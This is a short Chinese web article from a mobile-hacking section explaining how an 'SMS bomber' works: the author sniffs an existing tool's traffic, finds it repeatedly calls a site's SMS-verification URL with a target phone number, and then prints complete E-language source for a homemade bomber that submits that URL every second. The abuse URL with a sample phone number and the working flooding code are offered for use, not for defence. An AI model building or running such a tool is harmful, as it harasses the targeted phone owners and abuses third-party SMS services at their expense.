精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 网络安全 > 手机黑客 >

让手机炸弹不在神秘

2015-04-15 10:31 来源:互联网 编辑:admin
下载一个手机炸弹软件 随便输入一个手机号码然后选择次数之类的 利用WSockExpert_Cn.exe监听手机炸弹 得出http://sms.98960.com/pages/user-newlogin.asp?number=13088170991 原来手机炸弹只不过是一个URL循环提交的工具而已 按照他的思路我也写了一个类的手机炸弹工具 下载一个手机炸弹软件
随便输入一个手机号码然后选择次数之类的
利用WSockExpert_Cn.exe监听手机炸弹
得出http://sms.98960.com/pages/user-newlogin.asp?number=13088170991
原来手机炸弹只不过是一个URL循环提交的工具而已
按照他的思路我也写了一个类的手机炸弹工具
开发语言:易语言
源代码如下:
.支持库 HtmlView
.支持库 iext

.程序集 窗口程序集1

.子程序 _按钮1_被单击

超文本浏览框1.地址 = “http://sms.98960.com/pages/user-newlogin.asp?number=” + 编辑框1.内容
超级列表框1.插入表项 (, “message sannding successful!”, , , , )
时钟1.时钟周期 = 1000

.子程序 __启动窗口_创建完毕

按钮1.获取焦点 ()

.子程序 _按钮2_被单击

按钮1.禁止 = 真
时钟1.时钟周期 = 1215752191

.子程序 _按钮3_被单击

按钮1.禁止 = 假

.子程序 _时钟1_周期事件

_按钮1_被单击 ()


标签
你喜欢的文章
返回首页
扫描微信
返回顶部